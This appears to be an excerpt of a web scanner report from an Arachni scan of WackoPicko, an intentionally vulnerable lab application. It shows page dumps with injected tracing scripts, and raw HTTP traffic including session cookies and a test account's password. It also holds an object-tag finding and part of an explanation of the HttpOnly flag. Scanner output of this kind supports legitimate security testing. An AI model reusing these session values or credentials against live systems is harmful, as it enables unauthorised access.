arachni_js_namespace_code_stop */ </script> <!-- Injected by Arachni::Browser::Javascript --> <html> <head> <link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection"> <link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print"> <!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]--> <link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen"> <title>WackoPicko.com</title> </head> <body> <div class="container " style="border: 2px solid #5c95cf;"> <div class="column span-24 first last"> <h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1> </div> <div id="menu"> <div class="column prepend-1 span-14 first"> <ul class="menu"> <li class="current"><a href="/WackoPicko/users/home.php"><span>Home</span></a></li> <li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li> <li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li> <li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li> </ul> </div> <div class="column prepend-1 span-7 first last"> <ul class="menu top_login" > <li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li> </ul> </div> </div> <div class="column span-24 first last" id="search_bar_blue"> <div class="column prepend-17 span-7 first last" id="search_box"> <form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;"> <input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/> <input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" /> </form> </div> </div> <div class="column prepend-1 span-24 first last"> <h2>Welcome to WackoPicko</h2> <p> On WackoPicko, you can share all your crazy pics with your friends. <br /> But that's not all, you can also buy the rights to the high quality <br /> version of someone's pictures. WackoPicko is fun for the whole family. </p> <h3>New Here?</h3> <p> <h4><a href="/WackoPicko/users/register.php">Create an account</a></h4> </p> <p> <h4><a href="/WackoPicko/users/sample.php?userid=1">Check out a sample user!</a></h4> </p> <p> <h4><a href="/WackoPicko/calendar.php">What is going on today?</a></h4> </p> <p> <h4>Or you can test to see if WackoPicko can handle a file:</h4> <br /> <script> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); document.write('<form enctype="multipart/form-data" action="/WackoPicko/pic' + 'check' + '.php" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="30000" />Check this file: <input name="userfile" type="file" /> <br />With this name: <input name="name" type="text" /> <br /> <br /><input type="submit" value="Send File" /><br /> </form>'); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> </p> </div> <div class="column span-24 first last" id="footer" > <ul> <li><a href="/WackoPicko/">Home</a> |</li> <li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li> <li><a href="mailto:contact@wackopicko.com">Contact</a> |</li> <li><a href="/WackoPicko/tos.php">Terms of Service</a></li> </ul> </div> </div> </body> </html> |
Transitions describe the steps required to restore the state of the page, to the one it had when it was processed by the scanner, as a series of events. In essence, each transition represents a user interaction.
| # | Time | Event | Element | Options | ||
|---|---|---|---|---|---|---|
| 0 | 3.950414 | load |
page
|
|
||
| 1 | 2.996451 | request |
http://192.168.0.26/WackoPicko/ |
|
||
| 2 | 0.337047 | request |
http://192.168.0.26/WackoPicko/css/stylings.php |
|
Raw HTTP request used to retrieve the page.
GET /WackoPicko/ HTTP/1.1 Host: 192.168.0.26 Accept-Encoding: gzip, deflate User-Agent: Arachni/v1.5.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5 Accept-Language: en-CA,*
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:49:48 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1267
Content-Type: text/html
<script src="http://javascript.browser.arachni/polyfills.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://javascript.browser.arachni/taint_tracer.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://javascript.browser.arachni/dom_monitor.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script>
/* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({"PHPSESSID":{"stop_at_first":true,"trace":false},"euf2e0jqacaf66gdqmin1nb8k5":{"stop_at_first":true,"trace":false}}) /* arachni_js_namespace_initialize_stop */
window._arachni_js_namespace = true;
/* arachni_js_namespace_code_start */ /* arachni_js_namespace_code_stop */
</script> <!-- Injected by Arachni::Browser::Javascript -->
<html>
<head>
<link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
<link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print">
<!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
<link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
<title>WackoPicko.com</title>
</head>
<body>
<div class="container " style="border: 2px solid #5c95cf;">
<div class="column span-24 first last">
<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
</div>
<div id="menu">
<div class="column prepend-1 span-14 first">
<ul class="menu">
<li class="current"><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
<li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
<li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
<li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
</ul>
</div>
<div class="column prepend-1 span-7 first last">
<ul class="menu top_login" >
<li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
</ul>
</div>
</div>
<div class="column span-24 first last" id="search_bar_blue">
<div class="column prepend-17 span-7 first last" id="search_box">
<form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
<input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
<input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
</form>
</div>
</div>
<div class="column prepend-1 span-24 first last">
<h2>Welcome to WackoPicko</h2>
<p>
On WackoPicko, you can share all your crazy pics with your friends. <br />
But that's not all, you can also buy the rights to the high quality <br />
version of someone's pictures. WackoPicko is fun for the whole family.
</p>
<h3>New Here?</h3>
<p>
<h4><a href="/WackoPicko/users/register.php">Create an account</a></h4>
</p>
<p>
<h4><a href="/WackoPicko/users/sample.php?userid=1">Check out a sample user!</a></h4>
</p>
<p>
<h4><a href="/WackoPicko/calendar.php">What is going on today?</a></h4>
</p>
<p>
<h4>Or you can test to see if WackoPicko can handle a file:</h4> <br />
<script>
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
document.write('<form enctype="multipart/form-data" action="/WackoPicko/pic' + 'check' + '.php" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="30000" />Check this file: <input name="userfile" type="file" /> <br />With this name: <input name="name" type="text" /> <br /> <br /><input type="submit" value="Send File" /><br /> </form>');
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
</p>
</div>
<div class="column span-24 first last" id="footer" >
<ul>
<li><a href="/WackoPicko/">Home</a> |</li>
<li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
<li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
<li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
</ul>
</div>
</div>
</body>
</html>
This is the browser-evaluated body, as a result of the listed transitions.
0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 | <html><head><script src="http://javascript.browser.arachni/polyfills.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/taint_tracer.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/dom_monitor.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script> /* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({"PHPSESSID":{"stop_at_first":true,"trace":false},"euf2e0jqacaf66gdqmin1nb8k5":{"stop_at_first":true,"trace":false}}) /* arachni_js_namespace_initialize_stop */ window._arachni_js_namespace = true; /* arachni_js_namespace_code_start */ /* arachni_js_namespace_code_stop */ </script> <!-- Injected by Arachni::Browser::Javascript --> <link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection"> <link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print"> <!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]--> <link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen"> <title>WackoPicko.com</title> </head> <body> <div class="container " style="border: 2px solid #5c95cf;"> <div class="column span-24 first last"> <h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1> </div> <div id="menu"> <div class="column prepend-1 span-14 first"> <ul class="menu"> <li class="current"><a href="/WackoPicko/users/home.php"><span>Home</span></a></li> <li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li> <li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li> <li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li> </ul> </div> <div class="column prepend-1 span-7 first last"> <ul class="menu top_login"> <li><a href="/WackoPicko/users/login.php"><span>Login</span></a></li> </ul> </div> </div> <div class="column span-24 first last" id="search_bar_blue"> <div class="column prepend-17 span-7 first last" id="search_box"> <form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;"> <input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""> <input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;"> </form> </div> </div> <div class="column prepend-1 span-24 first last"> <h2>Welcome to WackoPicko</h2> <p> On WackoPicko, you can share all your crazy pics with your friends. <br> But that's not all, you can also buy the rights to the high quality <br> version of someone's pictures. WackoPicko is fun for the whole family. </p> <h3>New Here?</h3> <p> </p><h4><a href="/WackoPicko/users/register.php">Create an account</a></h4> <p></p> <p> </p><h4><a href="/WackoPicko/users/sample.php?userid=1">Check out a sample user!</a></h4> <p></p> <p> </p><h4><a href="/WackoPicko/calendar.php">What is going on today?</a></h4> <p></p> <p> </p><h4>Or you can test to see if WackoPicko can handle a file:</h4> <br> <script> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); document.write('<form enctype="multipart/form-data" action="/WackoPicko/pic' + 'check' + '.php" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="30000" />Check this file: <input name="userfile" type="file" /> <br />With this name: <input name="name" type="text" /> <br /> <br /><input type="submit" value="Send File" /><br /> </form>'); </script><form enctype="multipart/form-data" action="/WackoPicko/piccheck.php" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="30000">Check this file: <input name="userfile" type="file"> <br>With this name: <input name="name" type="text"> <br> <br><input type="submit" value="Send File"><br> </form> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <p></p> </div> <div class="column span-24 first last" id="footer"> <ul> <li><a href="/WackoPicko/">Home</a> |</li> <li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li> <li><a href="mailto:contact@wackopicko.com">Contact</a> |</li> <li><a href="/WackoPicko/tos.php">Terms of Service</a></li> </ul> </div> </div> </body></html> |
This is the original HTTP response body.
0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 | <script src="http://javascript.browser.arachni/polyfills.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/taint_tracer.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/dom_monitor.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script> /* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({"PHPSESSID":{"stop_at_first":true,"trace":false},"euf2e0jqacaf66gdqmin1nb8k5":{"stop_at_first":true,"trace":false}}) /* arachni_js_namespace_initialize_stop */ window._arachni_js_namespace = true; /* arachni_js_namespace_code_start */ /* arachni_js_namespace_code_stop */ </script> <!-- Injected by Arachni::Browser::Javascript --> <html> <head> <link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection"> <link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print"> <!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]--> <link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen"> <title>WackoPicko.com</title> </head> <body> <div class="container " style="border: 2px solid #5c95cf;"> <div class="column span-24 first last"> <h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1> </div> <div id="menu"> <div class="column prepend-1 span-14 first"> <ul class="menu"> <li class="current"><a href="/WackoPicko/users/home.php"><span>Home</span></a></li> <li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li> <li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li> <li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li> </ul> </div> <div class="column prepend-1 span-7 first last"> <ul class="menu top_login" > <li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li> </ul> </div> </div> <div class="column span-24 first last" id="search_bar_blue"> <div class="column prepend-17 span-7 first last" id="search_box"> <form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;"> <input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/> <input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" /> </form> </div> </div> <div class="column prepend-1 span-24 first last"> <h2>Welcome to WackoPicko</h2> <p> On WackoPicko, you can share all your crazy pics with your friends. <br /> But that's not all, you can also buy the rights to the high quality <br /> version of someone's pictures. WackoPicko is fun for the whole family. </p> <h3>New Here?</h3> <p> <h4><a href="/WackoPicko/users/register.php">Create an account</a></h4> </p> <p> <h4><a href="/WackoPicko/users/sample.php?userid=1">Check out a sample user!</a></h4> </p> <p> <h4><a href="/WackoPicko/calendar.php">What is going on today?</a></h4> </p> <p> <h4>Or you can test to see if WackoPicko can handle a file:</h4> <br /> <script> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); document.write('<form enctype="multipart/form-data" action="/WackoPicko/pic' + 'check' + '.php" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="30000" />Check this file: <input name="userfile" type="file" /> <br />With this name: <input name="name" type="text" /> <br /> <br /><input type="submit" value="Send File" /><br /> </form>'); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> </p> </div> <div class="column span-24 first last" id="footer" > <ul> <li><a href="/WackoPicko/">Home</a> |</li> <li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li> <li><a href="mailto:contact@wackopicko.com">Contact</a> |</li> <li><a href="/WackoPicko/tos.php">Terms of Service</a></li> </ul> </div> </div> </body> </html> |
Logs the existence of HTML object tags. Since Arachni can’t execute things like Java Applets and Flash this serves as a heads-up to the penetration tester to review the objects in question using a different method.
body
using
POST
at
http://192.168.0.26/WackoPicko/users/home.php
pointing to
http://192.168.0.26/WackoPicko/users/home.php
.
| Signature | Proof |
|---|---|
<object.*?>.*?</object> |
<OBJECT CLASSID="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000"
WIDTH="610"
HEIGHT="410"
CODEBASE="http://active.macromedia.com/flash5/cabs/swflash.cab#version=6,0,23,0">
<PARAM NAME="MOVIE" VALUE="/WackoPicko/action.swf?directory=%2FWackoPicko%2F">
<PARAM NAME="PLAY" VALUE="true">
<PARAM NAME="LOOP" VALUE="true">
<PARAM NAME="QUALITY" VALUE="high">
<param name="FlashVars" value="name1=value1&name2=value2" />
<EMBED SRC="/WackoPicko/action.swf?directory=%2FWackoPicko%2F" WIDTH="510" HEIGHT="410" FlashVars="name1=value1&name2=value2"
PLAY="true" ALIGN="" LOOP="true" QUALITY="high"
TYPE="application/x-shockwave-flash"
PLUGINSPAGE="http://www.macromedia.com/go/getflashplayer">
</EMBED>
</OBJECT>
|
Raw HTTP request used to retrieve the page.
GET /WackoPicko/users/home.php HTTP/1.1 Host: 192.168.0.26 Accept-Encoding: gzip, deflate User-Agent: Arachni/v1.5.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.8,he;q=0.6 X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec Cookie: PHPSESSID=qfbf2kvl5dcva1si172s0r7c64 username=_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec&firstname=arachni_name&lastname=arachni_name&password=5543%21%25arachni_secret&againpass=5543%21%25arachni_secret
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 303 See Other
Date: Mon, 06 Aug 2018 22:51:58 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: /WackoPicko/users/home.php
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 20
Content-Type: text/html
HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:51:58 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1409
Content-Type: text/html
<html>
<head>
<link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
<link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print">
<!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
<link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
<title>WackoPicko.com</title>
</head>
<body>
<div class="container " style="border: 2px solid #5c95cf;">
<div class="column span-24 first last">
<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
</div>
<div id="menu">
<div class="column prepend-1 span-14 first">
<ul class="menu">
<li class="current"><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
<li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
<li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
<li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
<li class=""><a href="/WackoPicko/cart/review.php"><span>Cart</span></a></li> </ul>
</div>
<div class="column prepend-1 span-7 first last">
<ul class="menu top_login" >
<li><a href="/WackoPicko/users/logout.php"><Span>Logout</span></a></li>
</ul>
</div>
</div>
<div class="column span-24 first last" id="search_bar_blue">
<div class="column prepend-17 span-7 first last" id="search_box">
<form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
<input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
<input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
</form>
</div>
</div>
<div class="column prepend-1 span-24 first last">
<h2>Hello _arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec, you got 100 Tradebuxs to spend!</h2>
<p>Cool stuff to do:</p>
<ul style="list-style-type:none;">
<li><a href="/WackoPicko/users/similar.php">Who's got a similar name to you?</a></li>
<li><a href="/WackoPicko/users/view.php?userid=16">Your Uploaded Pics</a></li>
<li><a href="/WackoPicko/pictures/purchased.php">Your Purchased Pics</a></li>
</ul>
<p>
Enter in our contest: <br/>
<OBJECT CLASSID="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000"
WIDTH="610"
HEIGHT="410"
CODEBASE="http://active.macromedia.com/flash5/cabs/swflash.cab#version=6,0,23,0">
<PARAM NAME="MOVIE" VALUE="/WackoPicko/action.swf?directory=%2FWackoPicko%2F">
<PARAM NAME="PLAY" VALUE="true">
<PARAM NAME="LOOP" VALUE="true">
<PARAM NAME="QUALITY" VALUE="high">
<param name="FlashVars" value="name1=value1&name2=value2" />
<EMBED SRC="/WackoPicko/action.swf?directory=%2FWackoPicko%2F" WIDTH="510" HEIGHT="410" FlashVars="name1=value1&name2=value2"
PLAY="true" ALIGN="" LOOP="true" QUALITY="high"
TYPE="application/x-shockwave-flash"
PLUGINSPAGE="http://www.macromedia.com/go/getflashplayer">
</EMBED>
</OBJECT>
</p>
</div>
<div class="column span-24 first last" id="footer" >
<ul>
<li><a href="/WackoPicko/">Home</a> |</li>
<li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
<li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
<li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
</ul>
</div>
</div>
</body>
</html>
Raw HTTP request used to retrieve the page.
GET /WackoPicko/users/home.php HTTP/1.1 Host: 192.168.0.26 Accept-Encoding: gzip, deflate User-Agent: Arachni/v1.5.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.8,he;q=0.6 X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec Cookie: PHPSESSID=qfbf2kvl5dcva1si172s0r7c64 username=_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec&firstname=arachni_name&lastname=arachni_name&password=5543%21%25arachni_secret&againpass=5543%21%25arachni_secret
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 303 See Other
Date: Mon, 06 Aug 2018 22:51:58 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: /WackoPicko/users/home.php
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 20
Content-Type: text/html
HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:51:58 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1409
Content-Type: text/html
<html>
<head>
<link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
<link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print">
<!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
<link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
<title>WackoPicko.com</title>
</head>
<body>
<div class="container " style="border: 2px solid #5c95cf;">
<div class="column span-24 first last">
<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
</div>
<div id="menu">
<div class="column prepend-1 span-14 first">
<ul class="menu">
<li class="current"><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
<li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
<li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
<li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
<li class=""><a href="/WackoPicko/cart/review.php"><span>Cart</span></a></li> </ul>
</div>
<div class="column prepend-1 span-7 first last">
<ul class="menu top_login" >
<li><a href="/WackoPicko/users/logout.php"><Span>Logout</span></a></li>
</ul>
</div>
</div>
<div class="column span-24 first last" id="search_bar_blue">
<div class="column prepend-17 span-7 first last" id="search_box">
<form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
<input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
<input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
</form>
</div>
</div>
<div class="column prepend-1 span-24 first last">
<h2>Hello _arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec, you got 100 Tradebuxs to spend!</h2>
<p>Cool stuff to do:</p>
<ul style="list-style-type:none;">
<li><a href="/WackoPicko/users/similar.php">Who's got a similar name to you?</a></li>
<li><a href="/WackoPicko/users/view.php?userid=16">Your Uploaded Pics</a></li>
<li><a href="/WackoPicko/pictures/purchased.php">Your Purchased Pics</a></li>
</ul>
<p>
Enter in our contest: <br/>
<OBJECT CLASSID="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000"
WIDTH="610"
HEIGHT="410"
CODEBASE="http://active.macromedia.com/flash5/cabs/swflash.cab#version=6,0,23,0">
<PARAM NAME="MOVIE" VALUE="/WackoPicko/action.swf?directory=%2FWackoPicko%2F">
<PARAM NAME="PLAY" VALUE="true">
<PARAM NAME="LOOP" VALUE="true">
<PARAM NAME="QUALITY" VALUE="high">
<param name="FlashVars" value="name1=value1&name2=value2" />
<EMBED SRC="/WackoPicko/action.swf?directory=%2FWackoPicko%2F" WIDTH="510" HEIGHT="410" FlashVars="name1=value1&name2=value2"
PLAY="true" ALIGN="" LOOP="true" QUALITY="high"
TYPE="application/x-shockwave-flash"
PLUGINSPAGE="http://www.macromedia.com/go/getflashplayer">
</EMBED>
</OBJECT>
</p>
</div>
<div class="column span-24 first last" id="footer" >
<ul>
<li><a href="/WackoPicko/">Home</a> |</li>
<li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
<li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
<li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
</ul>
</div>
</div>
</body>
</html>
HTTP by itself is a stateless protocol. Therefore the server is unable to determine which requests are performed by which client, and which clients are authenticated or unauthenticated.
The use of HTTP cookies within the headers, allows a web server to identify each individual client and can therefore determine which clients hold valid authentication, from those that do not. These are known as session cookies.
When a cookie is set by the server (sent the header of an HTTP response) there are several flags that can be set to configure the properties of the cookie and how it is to be handled by the browser.
The HttpOnly flag assists in the prevention of client side-scripts (such as
JavaScript) accessing and using the cookie.
